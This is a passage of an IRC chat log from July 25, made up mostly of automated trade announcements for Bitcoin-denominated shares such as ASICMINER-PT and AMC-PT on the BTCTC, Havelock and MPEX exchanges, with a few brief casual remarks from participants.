09:55:28 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 25 09:55:31 [BTCTC] [ASICMINER-PT] 6 @ 4.295 = 25.77 BTC [-] Jul 25 09:58:05 [BTCTC] [COGNITIVE] 1 @ 0.571 BTC [-] Jul 25 09:58:09 [BTCTC] [ASICMINER-PT] 2 @ 4.32 = 8.64 BTC [+] Jul 25 09:58:12 [BTCTC] [ASICMINER-PT] 1 @ 4.316 BTC [-] Jul 25 09:58:29 [BTCTC] [ASICMINER-PT] 1 @ 4.311 BTC [-] Jul 25 09:58:41 [BTCTC] [ASICMINER-PT] 2 @ 4.311 = 8.622 BTC [-] Jul 25 10:00:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.043 = 0.129 BTC [-] Jul 25 10:00:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [-] Jul 25 10:01:30 [BTCTC] [ASICMINER-PT] 1 @ 4.388 BTC [+] Jul 25 10:01:32 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [+] Jul 25 10:01:43 [BTCTC] [ASICMINER-PT] 15 @ 4.312 = 64.68 BTC [-] Jul 25 10:01:49 [BTCTC] [ASICMINER-PT] 2 @ 4.31 = 8.62 BTC [-] Jul 25 10:01:49 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 25 10:02:41 [BTCTC] [ASICMINER-PT] 4 @ 4.55 = 18.2 BTC [+] Jul 25 10:04:44 [BTCTC] [ASICMINER-PT] 2 @ 4.33 = 8.66 BTC [-] Jul 25 10:04:57 [BTCTC] [AMC-PT] 1 @ 0.0036 BTC [-] Jul 25 10:06:08 [BTCTC] [BASIC-MINING] 1 @ 0.3753 BTC [-] Jul 25 10:07:00 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003005 = 0.006 BTC [-] Jul 25 10:07:45 [BTCTC] [PAJKA.BOND] 2 @ 0.03702 = 0.074 BTC [-] Jul 25 10:08:10 [BTCTC] [PAJKA.BOND] 2 @ 0.03702 = 0.074 BTC [-] Jul 25 10:09:08 https://bitcointalk.org/index.php?topic=261066.msg2798760#msg2798760 Jul 25 10:09:09 lol Jul 25 10:09:09 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002725 = 0.0027 BTC [-] Jul 25 10:09:15 [WTS] Extremely Secure GPG keys Jul 25 10:09:36 bets usagi post ever? Jul 25 10:09:39 [BTCTC] [ASICMINER-PT] 1 @ 4.329 BTC [-] Jul 25 10:09:39 best* Jul 25 10:10:16 [BTCTC] [AMC-PT] 31 @ 0.003531 = 0.1095 BTC [-] Jul 25 10:11:28 quite possibly. Jul 25 10:11:32 [BTCTC] [ASICMINER-PT] 1 @ 4.292 BTC [-] Jul 25 10:12:03 [BTCTC] [ASICMINER-PT] 4 @ 4.329 = 17.316 BTC [+] Jul 25 10:12:04 [BTCTC] [ASICMINER-PT] 13 @ 4.33 = 56.29 BTC [+] Jul 25 10:12:48 i'm skeptical Jul 25 10:16:26 gtg Jul 25 10:20:01 [BTCTC] [ASICMINER-PT] 4 @ 4.35 = 17.4 BTC [+] Jul 25 10:22:39 [HAVELOCK] [SDSTM] 1 @ 0.01020001 BTC [-] Jul 25 10:22:52 [HAVELOCK] [SMG] 4 @ 0.00027 = 0.0011 BTC [-] Jul 25 10:23:57 Google Groups Jul 25 10:29:25 [BTCTC] [COGNITIVE] 1 @ 0.6289 BTC [+] Jul 25 10:29:27 [BTCTC] [COGNITIVE] 1 @ 0.6289 BTC [+] Jul 25 10:29:29 [BTCTC] [COGNITIVE] 8 @ 0.629 = 5.032 BTC [+] Jul 25 10:29:45 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [+] Jul 25 10:31:04 [BTCTC] [AMC-PT] 9 @ 0.003716 = 0.0334 BTC [+] Jul 25 10:31:37 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [+] Jul 25 10:34:29 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [+] Jul 25 10:35:44 [BTCTC] [ASICMINER-PT] 3 @ 4.35 = 13.05 BTC [-] Jul 25 10:37:25 [BTCTC] [AMC-PT] 200 @ 0.00354 = 0.708 BTC [-] Jul 25 10:37:27 [BTCTC] [AMC-PT] 100 @ 0.003539 = 0.3539 BTC [-] Jul 25 10:37:29 [BTCTC] [AMC-PT] 350 @ 0.003521 = 1.2324 BTC [-] Jul 25 10:37:31 [BTCTC] [AMC-PT] 700 @ 0.00352 = 2.464 BTC [-] Jul 25 10:37:32 [BTCTC] [AMC-PT] 100 @ 0.003503 = 0.3503 BTC [-] Jul 25 10:37:33 [BTCTC] [AMC-PT] 10 @ 0.003502 = 0.035 BTC [-] Jul 25 10:37:35 [BTCTC] [AMC-PT] 1000 @ 0.003501 = 3.501 BTC [-] Jul 25 10:37:36 [BTCTC] [AMC-PT] 1425 @ 0.0035 = 4.9875 BTC [-] Jul 25 10:37:38 [BTCTC] [ASICMINER-PT] 9 @ 4.37 = 39.33 BTC [+] Jul 25 10:37:39 [BTCTC] [AMC-PT] 152 @ 0.003421 = 0.52 BTC [-] Jul 25 10:38:24 [BTCTC] [ASICMINER-PT] 10 @ 4.37 = 43.7 BTC [+] Jul 25 10:38:41 [BTCTC] [ASICMINER-PT] 1 @ 4.346 BTC [-] Jul 25 10:38:43 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [-] Jul 25 10:42:22 [BTCTC] [ASICMINER-PT] 6 @ 4.37 = 26.22 BTC [+] Jul 25 10:43:20 [BTCTC] [TAT.ASICMINER] 52 @ 0.04584 = 2.3837 BTC [+] Jul 25 10:43:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.04585 = 0.1376 BTC [+] Jul 25 10:43:24 [BTCTC] [TAT.ASICMINER] 101 @ 0.04587 = 4.6329 BTC [+] Jul 25 10:43:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.04588 BTC [+] Jul 25 10:43:28 [BTCTC] [TAT.ASICMINER] 15 @ 0.04589 = 0.6884 BTC [+] Jul 25 10:43:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.04598 = 0.3678 BTC [+] Jul 25 10:43:32 [BTCTC] [TAT.ASICMINER] 309 @ 0.04599 = 14.2109 BTC [+] Jul 25 10:43:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.046 = 0.92 BTC [+] Jul 25 10:43:36 [BTCTC] [TAT.ASICMINER] 55 @ 0.046 = 2.53 BTC [+] Jul 25 10:43:38 [BTCTC] [TAT.ASICMINER] 33 @ 0.0465 = 1.5345 BTC [+] Jul 25 10:43:39 [BTCTC] [TAT.ASICMINER] 30 @ 0.0466 = 1.398 BTC [+] Jul 25 10:43:40 [BTCTC] [TAT.ASICMINER] 30 @ 0.0467 = 1.401 BTC [+] Jul 25 10:43:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.0468 = 0.1404 BTC [+] Jul 25 10:44:21 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [+] Jul 25 10:45:33 [BTCTC] [ASICMINER-PT] 2 @ 4.482 = 8.964 BTC [+] Jul 25 10:49:11 [HAVELOCK] [SDSTM] 2 @ 0.01020001 = 0.0204 BTC [-] Jul 25 10:49:13 [HAVELOCK] [SDSTM] 1 @ 0.0102 BTC [-] Jul 25 10:49:16 [HAVELOCK] [SDSTM] 1 @ 0.0102 BTC [-] Jul 25 10:49:18 [HAVELOCK] [SDSTM] 21 @ 0.01012 = 0.2125 BTC [-] Jul 25 10:49:20 [HAVELOCK] [SDSTM] 4 @ 0.010101 = 0.0404 BTC [-] Jul 25 10:49:22 [HAVELOCK] [SDSTM] 2 @ 0.0100001 = 0.02 BTC [-] Jul 25 10:49:23 [HAVELOCK] [SDSTM] 9 @ 0.01000001 = 0.09 BTC [-] Jul 25 10:49:25 [HAVELOCK] [SDSTM] 52 @ 0.01 = 0.52 BTC [-] Jul 25 10:49:27 [HAVELOCK] [SDSTM] 7 @ 0.01 = 0.07 BTC [-] Jul 25 10:49:29 [HAVELOCK] [SDSTM] 3 @ 0.01 = 0.03 BTC [-] Jul 25 10:50:28 [HAVELOCK] [SDSTM] 50 @ 0.00996 = 0.498 BTC [-] Jul 25 10:50:31 [HAVELOCK] [SDSTM] 20 @ 0.00993 = 0.1986 BTC [-] Jul 25 10:50:33 [HAVELOCK] [SDSTM] 160 @ 0.00992 = 1.5872 BTC [-] Jul 25 10:50:35 [HAVELOCK] [SDSTM] 9 @ 0.00991 = 0.0892 BTC [-] Jul 25 10:54:14 [BTCTC] [ASICMINER-PT] 3 @ 4.482 = 13.446 BTC [+] Jul 25 10:54:24 [BTCTC] [ASICMINER-PT] 1 @ 4.483 BTC [+] Jul 25 10:54:26 [BTCTC] [ASICMINER-PT] 1 @ 4.491 BTC [+] Jul 25 10:54:47 [BTCTC] [GSDPT] 1433 @ 0.00349 = 5.0012 BTC [+] Jul 25 10:54:49 [BTCTC] [GSDPT] 38 @ 0.003498 = 0.1329 BTC [+] Jul 25 10:55:02 [BTCTC] [GSDPT] 75 @ 0.0035 = 0.2625 BTC [+] Jul 25 10:55:07 [BTCTC] [GSDPT] 3454 @ 0.0035 = 12.089 BTC [+] Jul 25 10:55:08 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [+] Jul 25 10:57:30 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [+] Jul 25 10:57:38 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [+] Jul 25 10:58:26 [MPEX] [S.MPOE] 10050 @ 0.00080489 = 8.0891 BTC [+] Jul 25 10:58:28 [MPEX] [S.MPOE] 3650 @ 0.00080743 = 2.9471 BTC [+] Jul 25 11:00:48 [BTCTC] [CRYPTO-TRADE] 6 @ 0.199 = 1.194 BTC [+] Jul 25 11:01:42 [BTCTC] [COGNITIVE] 2 @ 0.629 = 1.258 BTC [+] Jul 25 11:02:39 [BTCTC] [ASICMINER-PT] 1 @ 4.401 BTC [-] Jul 25 11:03:37 [BTCTC] [BFMINES] 1 @ 0.003201 BTC [+] Jul 25 11:12:49 [BTCTC] [AMC-PT] 60 @ 0.0036 = 0.216 BTC [+] Jul 25 11:19:21 [BTCTC] [ASICMINER-PT] 2 @ 4.406 = 8.812 BTC [+] Jul 25 11:19:25 [BTCTC] [ASICMINER-PT] 5 @ 4.402 = 22.01 BTC [-] Jul 25 11:19:38 [BTCTC] [ASICMINER-PT] 3 @ 4.401 = 13.203 BTC [-] Jul 25 11:19:40 [BTCTC] [ASICMINER-PT] 15 @ 4.4 = 66 BTC [-] Jul 25 11:19:42 [BTCTC] [ASICMINER-PT] 1 @ 4.382 BTC [-] Jul 25 11:19:46 [BTCTC] [ASICMINER-PT] 10 @ 4.375 = 43.75 BTC [-] Jul 25 11:20:04 [BTCTC] [ASICMINER-PT] 4 @ 4.36 = 17.44 BTC [-] Jul 25 11:24:54 [BTCTC] [ASICMINER-PT] 1 @ 4.489 BTC [+] Jul 25 11:25:03 [BTCTC] [BASIC-MINING] 4 @ 0.439 = 1.756 BTC [+] Jul 25 11:25:43 [BTCTC] [ASICMINER-PT] 1 @ 4.489 BTC [+] Jul 25 11:28:28 [BTCTC] [ASICMINER-PT] 2 @ 4.37 = 8.74 BTC [-] Jul 25 11:28:30 [BTCTC] [ASICMINER-PT] 24 @ 4.361 = 104.664 BTC [-] Jul 25 11:28:32 [BTCTC] [ASICMINER-PT] 6 @ 4.36 = 26.16 BTC [-] Jul 25 11:28:33 [BTCTC] [ASICMINER-PT] 1 @ 4.351 BTC [-] Jul 25 11:29:08 [HAVELOCK] [AM100] 1 @ 0.04266011 BTC [-] Jul 25 11:32:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.04679 = 0.0936 BTC [-] Jul 25 11:36:08 [HAVELOCK] [HIM] 5 @ 0.232 = 1.16 BTC [-] Jul 25 11:36:20 [HAVELOCK] [HIM] 20 @ 0.23 = 4.6 BTC [-] Jul 25 11:36:25 [HAVELOCK] [HIM] 50 @ 0.22 = 11 BTC [-] Jul 25 11:43:20 [BTCTC] [AMC-PT] 31 @ 0.003694 = 0.1145 BTC [+] Jul 25 11:43:22 [BTCTC] [AMC-PT] 63 @ 0.003695 = 0.2328 BTC [+] Jul 25 11:43:23 [BTCTC] [AMC-PT] 125 @ 0.003698 = 0.4623 BTC [+] Jul 25 11:43:25 [BTCTC] [AMC-PT] 150 @ 0.003699 = 0.5549 BTC [+] Jul 25 11:43:26 [BTCTC] [AMC-PT] 200 @ 0.0037 = 0.74 BTC [+] Jul 25 11:43:28 [BTCTC] [AMC-PT] 50 @ 0.003709 = 0.1855 BTC [+] Jul 25 11:43:28 [BTCTC] [AMC-PT] 100 @ 0.00371 = 0.371 BTC [+] Jul 25 11:43:30 [BTCTC] [AMC-PT] 424 @ 0.003715 = 1.5752 BTC [+] Jul 25 11:43:31 [BTCTC] [AMC-PT] 200 @ 0.003716 = 0.7432 BTC [+] Jul 25 11:43:33 [BTCTC] [AMC-PT] 1100 @ 0.003717 = 4.0887 BTC [+] Jul 25 11:43:34 [BTCTC] [AMC-PT] 100 @ 0.00373 = 0.373 BTC [+] Jul 25 11:43:36 [BTCTC] [AMC-PT] 96 @ 0.003738 = 0.3588 BTC [+] Jul 25 11:43:37 [BTCTC] [AMC-PT] 100 @ 0.00375 = 0.375 BTC [+] Jul 25 11:43:38 [BTCTC] [AMC-PT] 464 @ 0.0038 = 1.7632 BTC [+] Jul 25 11:43:40 [BTCTC] [AMC-PT] 238 @ 0.0038 = 0.9044 BTC [+] Jul 25 11:43:44 [BTCTC] [AMC-PT] 200 @ 0.00381 = 0.762 BTC [+] Jul 25 11:43:46 [BTCTC] [AMC-PT] 4310 @ 0.003827 = 16.4944 BTC [+] Jul 25 11:43:46 [BTCTC] [AMC-PT] 25 @ 0.003829 = 0.0957 BTC [+] Jul 25 11:43:48 [BTCTC] [AMC-PT] 100 @ 0.00383 = 0.383 BTC [+] Jul 25 11:43:49 [BTCTC] [AMC-PT] 38 @ 0.003837 = 0.1458 BTC [+] Jul 25 11:43:51 [BTCTC] [AMC-PT] 2206 @ 0.003847 = 8.4865 BTC [+] Jul 25 11:43:52 [BTCTC] [AMC-PT] 1680 @ 0.003848 = 6.4646 BTC [+] Jul 25 11:44:11 um yes, that makes sense Jul 25 11:45:25 [BTCTC] [CRYPTO-TRADE] 44 @ 0.2 = 8.8 BTC [+] Jul 25 11:45:55 [BTCTC] [DMS.SELLING] 50 @ 0.02051 = 1.0255 BTC [+] Jul 25 11:46:15 [BTCTC] [ASICMINER-PT] 5 @ 4.309 = 21.545 BTC [-] Jul 25 11:49:46 [BTCTC] [ASICMINER-PT] 1 @ 4.307 BTC [-] Jul 25 11:49:48 [BTCTC] [ASICMINER-PT] 1 @ 4.303 BTC [-] Jul 25 11:49:51 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [-] Jul 25 11:49:52 [BTCTC] [ASICMINER-PT] 10 @ 4.297 = 42.97 BTC [-] Jul 25 11:49:54 [BTCTC] [ASICMINER-PT] 1 @ 4.296 BTC [-] Jul 25 11:49:56 [BTCTC] [ASICMINER-PT] 1 @ 4.296 BTC [-] Jul 25 11:51:46 [HAVELOCK] [HIM] 5 @ 0.22 = 1.1 BTC [-] Jul 25 12:00:38 [BTCTC] [ASICMINER-PT] 1 @ 4.291 BTC [-] Jul 25 12:00:43 [HAVELOCK] [SDSTM] 3 @ 0.0098 = 0.0294 BTC [-] Jul 25 12:00:46 [HAVELOCK] [SDSTM] 3 @ 0.0098 = 0.0294 BTC [-] Jul 25 12:00:48 [HAVELOCK] [SDSTM] 3 @ 0.0096 = 0.0288 BTC [-] Jul 25 12:00:50 [HAVELOCK] [SDSTM] 3 @ 0.0096 = 0.0288 BTC [-] Jul 25 12:00:52 [HAVELOCK] [SDSTM] 3 @ 0.0094 = 0.0282 BTC [-] Jul 25 12:00:54 [HAVELOCK] [SDSTM] 3 @ 0.0094 = 0.0282 BTC [-] Jul 25 12:00:56 [HAVELOCK] [SDSTM] 2 @ 0.0093 = 0.0186 BTC [-] Jul 25 12:00:59 [HAVELOCK] [SDSTM] 11 @ 0.00923 = 0.1015 BTC [-] Jul 25 12:01:01 [BTCTC] [ASICMINER-PT] 2 @ 4.29 = 8.58 BTC [-] Jul 25 12:01:03 [BTCTC] [ASICMINER-PT] 1 @ 4.266 BTC [-] Jul 25 12:01:05 [BTCTC] [ASICMINER-PT] 1 @ 4.265 BTC [-] Jul 25 12:01:07 [BTCTC] [ASICMINER-PT] 3 @ 4.265 = 12.795 BTC [-] Jul 25 12:02:24 [BTCTC] [ASICMINER-PT] 1 @ 4.422 BTC [+] Jul 25 12:07:08 [BTCTC] [DMS.MINING] 50 @ 0.01271 = 0.6355 BTC [-] Jul 25 12:07:47 [BTCTC] [DMS.MINING] 180 @ 0.0127 = 2.286 BTC [-] Jul 25 12:07:49 [BTCTC] [DMS.MINING] 100 @ 0.0127 = 1.27 BTC [-] Jul 25 12:07:50 [BTCTC] [DMS.MINING] 1 @ 0.0127 BTC [-] Jul 25 12:08:41 [BTCTC] [DMS.MINING] 60 @ 0.01255 = 0.753 BTC [-] Jul 25 12:09:21 [BTCTC] [DMS.MINING] 109 @ 0.01251 = 1.3636 BTC [-] Jul 25 12:13:21 [MPEX] [S.MPOE] 2514 @ 0.00080206 = 2.0164 BTC [-] Jul 25 12:13:22 [MPEX] [S.MPOE] 6600 @ 0.00079879 = 5.272 BTC [-] Jul 25 12:16:08 [HAVELOCK] [AM100] 11 @ 0.04266011 = 0.4693 BTC [-] Jul 25 12:16:21 [HAVELOCK] [HIM] 2 @ 0.22 = 0.44 BTC [-] Jul 25 12:18:44 [HAVELOCK] [SDSTM] 28 @ 0.01020001 = 0.2856 BTC [+] Jul 25 12:18:47 [BTCTC] [ASICMINER-PT] 1 @ 4.279 BTC [-] Jul 25 12:20:50 [BTCTC] [ASICMINER-PT] 1 @ 4.279 BTC [-] Jul 25 12:22:22 [BTCTC] [BASIC-MINING] 1 @ 0.439 BTC [+] Jul 25 12:22:41 [BTCTC] [ASICMINER-PT] 1 @ 4.278 BTC [-] Jul 25 12:22:43 [BTCTC] [ASICMINER-PT] 10 @ 4.278 = 42.78 BTC [-] Jul 25 12:23:09 [BTCTC] [ASICMINER-PT] 5 @ 4.279 = 21.395 BTC [+] Jul 25 12:26:42 [BTCTC] [TAT.ASICMINER] 12 @ 0.0438 = 0.5256 BTC [-] Jul 25 12:26:44 [BTCTC] [TAT.ASICMINER] 18 @ 0.0438 = 0.7884 BTC [-] Jul 25 12:28:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.04321 = 0.2593 BTC [-] Jul 25 12:29:07 [BTCTC] [TAT.ASICMINER] 12 @ 0.0432 = 0.5184 BTC [-] Jul 25 12:33:29 [BTCTC] [ASICMINER-PT] 1 @ 4.275 BTC [-] Jul 25 12:37:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.04379 = 0.219 BTC [+] Jul 25 12:37:58 [BTCTC] [TAT.ASICMINER] 49 @ 0.04379 = 2.1457 BTC [+] Jul 25 12:38:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.04316 = 0.1726 BTC [-] Jul 25 12:38:01 [BTCTC] [TAT.ASICMINER] 9 @ 0.04315 = 0.3884 BTC [-] Jul 25 12:38:03 [BTCTC] [TAT.ASICMINER] 7 @ 0.04312 = 0.3018 BTC [-] Jul 25 12:38:06 [BTCTC] [TAT.ASICMINER] 6 @ 0.0431 = 0.2586 BTC [-] Jul 25 12:38:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [-] Jul 25 12:38:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.04251 = 0.085 BTC [-] Jul 25 12:38:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.0425 = 0.17 BTC [-] Jul 25 12:38:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.04215 BTC [-] Jul 25 12:38:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.04214 = 0.1264 BTC [-] Jul 25 12:38:27 [BTCTC] [TAT.ASICMINER] 12 @ 0.04213 = 0.5056 BTC [-] Jul 25 12:38:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.04213 BTC [-] Jul 25 12:39:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.04213 BTC [-] Jul 25 12:39:36 [HAVELOCK] [SMG] 1 @ 0.00027 BTC [-] Jul 25 12:39:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.04213 BTC [-] Jul 25 12:40:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.04213 BTC [-] Jul 25 12:41:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.04213 BTC [-] Jul 25 12:42:46 [HAVELOCK] [SDSTM] 4 @ 0.01020001 = 0.0408 BTC [+] Jul 25 12:47:08 [BTCTC] [TAT.ASICMINER] 17 @ 0.04213 = 0.7162 BTC [-] Jul 25 12:47:09 [BTCTC] [TAT.ASICMINER] 70 @ 0.04213 = 2.9491 BTC [-] Jul 25 12:47:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.04213 = 0.4213 BTC [-] Jul 25 12:50:54 [BTCTC] [ASICMINER-PT] 2 @ 4.267 = 8.534 BTC [-] Jul 25 12:50:55 [MPEX] [S.MPOE] 13536 @ 0.00079728 = 10.792 BTC [-] Jul 25 12:50:57 [BTCTC] [ASICMINER-PT] 4 @ 4.267 = 17.068 BTC [-] Jul 25 12:54:38 [HAVELOCK] [AM100] 2 @ 0.0435 = 0.087 BTC [+] Jul 25 12:55:57 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [+] Jul 25 12:55:59 [BTCTC] [ASICMINER-PT] 1 @ 4.379 BTC [+] Jul 25 12:56:01 [BTCTC] [ASICMINER-PT] 1 @ 4.396 BTC [+] Jul 25 12:56:03 [BTCTC] [ASICMINER-PT] 2 @ 4.397 = 8.794 BTC [+] Jul 25 12:56:04 [BTCTC] [ASICMINER-PT] 1 @ 4.397 BTC [+] Jul 25 12:56:06 [BTCTC] [ASICMINER-PT] 15 @ 4.398 = 65.97 BTC [+] Jul 25 12:56:07 [BTCTC] [ASICMINER-PT] 1 @ 4.439 BTC [+] Jul 25 12:56:09 [BTCTC] [ASICMINER-PT] 18 @ 4.44 = 79.92 BTC [+] Jul 25 12:56:11 [BTCTC] [ASICMINER-PT] 3 @ 4.499 = 13.497 BTC [+] Jul 25 12:56:13 [BTCTC] [ASICMINER-PT] 25 @ 4.5 = 112.5 BTC [+] Jul 25 12:56:15 [BTCTC] [ASICMINER-PT] 5 @ 4.549 = 22.745 BTC [+] Jul 25 12:56:22 [BTCTC] [ASICMINER-PT] 20 @ 4.57 = 91.4 BTC [+] Jul 25 12:56:24 [BTCTC] [ASICMINER-PT] 7 @ 4.65 = 32.55 BTC [+] Jul 25 12:56:26 [BTCTC] [ASICMINER-PT] 20 @ 4.659 = 93.18 BTC [+] Jul 25 12:56:28 [BTCTC] [ASICMINER-PT] 1 @ 4.663 BTC [+] Jul 25 12:57:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.04213 = 0.1685 BTC [-] Jul 25 12:58:02 [BTCTC] [ASICMINER-PT] 5 @ 4.664 = 23.32 BTC [+] Jul 25 12:58:04 [BTCTC] [ASICMINER-PT] 3 @ 4.673 = 14.019 BTC [+] Jul 25 12:58:05 [BTCTC] [ASICMINER-PT] 1 @ 4.674 BTC [+] Jul 25 12:58:07 [BTCTC] [ASICMINER-PT] 1 @ 4.674 BTC [+] Jul 25 12:58:09 [BTCTC] [ASICMINER-PT] 2 @ 4.69 = 9.38 BTC [+] Jul 25 12:58:11 [BTCTC] [ASICMINER-PT] 3 @ 4.695 = 14.085 BTC [+] Jul 25 12:58:14 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 25 12:58:15 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [+] Jul 25 12:58:17 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [+] Jul 25 12:58:24 [BTCTC] [ASICMINER-PT] 10 @ 4.721 = 47.21 BTC [+] Jul 25 12:58:26 [BTCTC] [ASICMINER-PT] 1 @ 4.73 BTC [+] Jul 25 12:58:28 [BTCTC] [ASICMINER-PT] 1 @ 4.74 BTC [+] Jul 25 12:58:29 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 25 12:58:31 [BTCTC] [ASICMINER-PT] 2 @ 4.782 = 9.564 BTC [+] Jul 25 12:58:33 [BTCTC] [ASICMINER-PT] 1 @ 4.787 BTC [+] Jul 25 12:58:35 [BTCTC] [ASICMINER-PT] 8 @ 4.791 = 38.328 BTC [+] Jul 25 12:58:36 [BTCTC] [ASICMINER-PT] 1 @ 4.791 BTC [+] Jul 25 12:58:38 [BTCTC] [ASICMINER-PT] 4 @ 4.792 = 19.168 BTC [+] Jul 25 12:58:41 [BTCTC] [ASICMINER-PT] 5 @ 4.795 = 23.975 BTC [+] Jul 25 12:58:43 [BTCTC] [ASICMINER-PT] 1 @ 4.799 BTC [+] Jul 25 12:58:45 [BTCTC] [ASICMINER-PT] 1 @ 4.799 BTC [+] Jul 25 12:58:47 [BTCTC] [ASICMINER-PT] 2 @ 4.8 = 9.6 BTC [+] Jul 25 12:58:48 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [+] Jul 25 12:58:50 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [+] Jul 25 12:59:00 [BTCTC] [ASICMINER-PT] 10 @ 4.8 = 48 BTC [+] Jul 25 12:59:02 [BTCTC] [ASICMINER-PT] 1 @ 4.808 BTC [+] Jul 25 12:59:04 [BTCTC] [ASICMINER-PT] 10 @ 4.81 = 48.1 BTC [+] Jul 25 12:59:06 [BTCTC] [ASICMINER-PT] 1 @ 4.82 BTC [+] Jul 25 12:59:09 [BTCTC] [ASICMINER-PT] 1 @ 4.82 BTC [+] Jul 25 12:59:11 [BTCTC] [ASICMINER-PT] 3 @ 4.84 = 14.52 BTC [+] Jul 25 12:59:13 [BTCTC] [ASICMINER-PT] 5 @ 4.85 = 24.25 BTC [+] Jul 25 12:59:16 [BTCTC] [ASICMINER-PT] 10 @ 4.85 = 48.5 BTC [+] Jul 25 12:59:18 [BTCTC] [ASICMINER-PT] 1 @ 4.85 BTC [+] Jul 25 12:59:21 [BTCTC] [ASICMINER-PT] 1 @ 4.89 BTC [+] Jul 25 12:59:23 [BTCTC] [ASICMINER-PT] 11 @ 4.89 = 53.79 BTC [+] Jul 25 12:59:25 [BTCTC] [ASICMINER-PT] 2 @ 4.89 = 9.78 BTC [+] Jul 25 12:59:27 [BTCTC] [ASICMINER-PT] 3 @ 4.899 = 14.697 BTC [+] Jul 25 12:59:30 [BTCTC] [ASICMINER-PT] 1 @ 4.849 BTC [-] Jul 25 12:59:32 [BTCTC] [ASICMINER-PT] 19 @ 4.899 = 93.081 BTC [+] Jul 25 12:59:34 [BTCTC] [ASICMINER-PT] 11 @ 4.899999 = 53.9 BTC [+] Jul 25 12:59:36 [BTCTC] [ASICMINER-PT] 10 @ 4.9 = 49 BTC [+] Jul 25 12:59:38 [BTCTC] [ASICMINER-PT] 2 @ 4.9 = 9.8 BTC [+] Jul 25 12:59:39 [BTCTC] [ASICMINER-PT] 1 @ 4.9 BTC [+] Jul 25 12:59:42 [BTCTC] [ASICMINER-PT] 4 @ 4.9 = 19.6 BTC [+] Jul 25 12:59:43 [BTCTC] [ASICMINER-PT] 10 @ 4.9 = 49 BTC [+] Jul 25 12:59:45 [BTCTC] [ASICMINER-PT] 1 @ 4.949999 BTC [+] Jul 25 12:59:48 [BTCTC] [ASICMINER-PT] 5 @ 4.95 = 24.75 BTC [+] Jul 25 12:59:49 [BTCTC] [ASICMINER-PT] 10 @ 4.95 = 49.5 BTC [+] Jul 25 12:59:51 [BTCTC] [ASICMINER-PT] 1 @ 4.95 BTC [+] Jul 25 12:59:53 [BTCTC] [ASICMINER-PT] 2 @ 4.96 = 9.92 BTC [+] Jul 25 12:59:55 [BTCTC] [ASICMINER-PT] 1 @ 4.969999 BTC [+] Jul 25 12:59:56 [BTCTC] [ASICMINER-PT] 19 @ 4.97 = 94.43 BTC [+] Jul 25 13:00:37 [HAVELOCK] [HIM] 1 @ 0.22 BTC [-] Jul 25 13:02:12 [BTCTC] [ASICMINER-PT] 12 @ 4.969 = 59.628 BTC [-] Jul 25 13:02:16 [BTCTC] [ASICMINER-PT] 1 @ 4.97 BTC [+] Jul 25 13:02:20 [BTCTC] [ASICMINER-PT] 5 @ 4.988 = 24.94 BTC [+] Jul 25 13:02:22 [BTCTC] [ASICMINER-PT] 5 @ 4.989 = 24.945 BTC [+] Jul 25 13:05:30 woosh Jul 25 13:05:34 lol Jul 25 13:05:43 someone just bought some AM :) Jul 25 13:10:48 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 25 13:10:48 [BTCTC] [ASICMINER-PT] 1 @ 4.839 BTC [-] Jul 25 13:10:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00305 BTC [+] Jul 25 13:11:15 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.003004 = 0.1472 BTC [-] Jul 25 13:11:53 [BTCTC] [ASICMINER-PT] 1 @ 4.84 BTC [+] Jul 25 13:12:49 [BTCTC] [ASICMINER-PT] 1 @ 4.85 BTC [+] Jul 25 13:14:11 [BTCTC] [AMC-PT] 1 @ 0.003799 BTC [-] Jul 25 13:15:09 [MPEX] [S.MG] 5000 @ 0.000264 = 1.32 BTC [+] Jul 25 13:15:10 [MPEX] [S.MG] 194500 @ 0.000265 = 51.5425 BTC [+] Jul 25 13:15:27 [MPEX] [S.MG] 500 @ 0.000267 = 0.1335 BTC [+] Jul 25 13:15:57 [HAVELOCK] 